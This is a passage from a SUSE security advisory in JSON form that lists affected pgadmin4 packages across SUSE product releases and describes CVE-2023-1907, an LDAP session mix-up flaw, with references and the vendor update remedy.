"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Manager Proxy 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Proxy 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Proxy 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-1907",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-1907"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability was found in pgadmin. Users logging into pgAdmin running in server mode using LDAP authentication may be attached to another user\u0027s session if multiple connection attempts occur simultaneously.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-1907",
"url": "https://www.suse.com/security/cve/CVE-2023-1907"
},
{
"category": "external",
"summary": "SUSE Bug 1234840 for CVE-2023-1907",
"url": "https://bugzilla.suse.com/1234840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
